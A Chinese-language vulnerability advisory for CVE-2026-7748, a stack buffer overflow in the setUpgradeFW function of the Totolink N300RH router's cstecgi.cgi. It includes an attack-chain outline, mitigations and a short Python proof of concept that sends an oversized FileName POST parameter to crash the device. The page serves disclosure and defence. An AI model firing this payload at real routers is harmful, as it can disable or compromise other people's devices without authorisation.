CVE-2026-7748 Totolink N300RH缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-7748

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink N300RH

漏洞概述

Totolink N300RH 3.2.4-B20220812 版本中被发现存在高危安全漏洞。问题出在 /cgi-bin/cstecgi.cgi 文件的 setUpgradeFW 函数处理逻辑中。攻击者无需用户交互，仅凭低权限即可远程发送特制 POST 请求，通过操纵 FileName 参数引发缓冲区溢出。此漏洞可能导致设备被完全控制，且公开利用代码已发布，风险极高。

技术细节

该漏洞的核心原理是典型的栈缓冲区溢出。在 Totolink N300RH 设备的 Web 管理接口中，`/cgi-bin/cstecgi.cgi` 脚本负责处理固件升级等操作。其中的 `setUpgradeFW` 函数接收来自客户端的 POST 数据。当处理 `FileName` 参数时，程序使用了不安全的函数（如 `strcpy` 或类似操作），直接将用户输入的数据复制到固定大小的栈缓冲区中，而未对输入长度进行严格校验。攻击者通过精心构造包含特定载荷的超长字符串作为 `FileName` 值发送给服务器，即可覆盖函数的返回地址。一旦控制流程被劫持，攻击者即可在设备上执行任意 Shellcode 或指令。鉴于攻击路径为网络（AV:N）且无需用户干预，此漏洞极易被蠕虫化利用，造成大规模设备沦陷。

攻击链分析

STEP 1

侦察

攻击者通过网络扫描识别暴露的 Totolink N300RH 设备及其固件版本。

STEP 2

漏洞利用

攻击者向目标设备的 /cgi-bin/cstecgi.cgi 接口发送特制的恶意 POST 请求，其中包含超长的 FileName 参数。

STEP 3

溢出触发

setUpgradeFW 函数未校验 FileName 长度，导致栈缓冲区被填充，覆盖返回地址，触发缓冲区溢出。

STEP 4

代码执行

程序流程被劫持，攻击者获得设备控制权，可执行任意命令（RCE）或导致设备拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_ip):
    """
    PoC for CVE-2026-7748 Buffer Overflow in Totolink N300RH
    Target: /cgi-bin/cstecgi.cgi -> setUpgradeFW
    """
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; ExploitBot/1.0)"
    }
    
    # Payload构造：发送超长FileName参数触发溢出
    # 实际攻击中此处可能包含Shellcode或返回地址跳转
    overflow_payload = "A" * 1000 
    
    data = {
        "action": "setUpgradeFW",
        "FileName": overflow_payload
    }
    
    try:
        print(f"[+] Sending payload to {target_ip}...")
        response = requests.post(url, headers=headers, data=data, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check device for crash or shell.")
        else:
            print(f"[-] Unexpected response code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        # Crash often leads to connection drop, which is expected
        print("[!] Device may have crashed due to buffer overflow.")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_poc(target)

影响范围

Totolink N300RH 3.2.4-B20220812

防御指南

临时缓解措施

如果无法立即升级，建议将设备管理界面置于内网，禁止通过互联网直接访问；配置防火墙规则，阻断外部对设备 80/443 端口的非信任访问；或暂时关闭设备的远程管理功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7748
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7748
3 Details https://www.cvedetails.com/cve/CVE-2026-7748/
4 VulDB https://vuldb.com/cve/CVE-2026-7748
5 Link https://lavender-bicycle-a5a.notion.site/TOTOLINK-N300RH-setUpgradeFW-34553a41781f80abb1d1c627d7ff4329?pvs=73
6 Link https://vuldb.com/submit/807202
7 Link https://vuldb.com/vuln/360923
8 Link https://vuldb.com/vuln/360923/cti
9 Link https://www.totolink.net/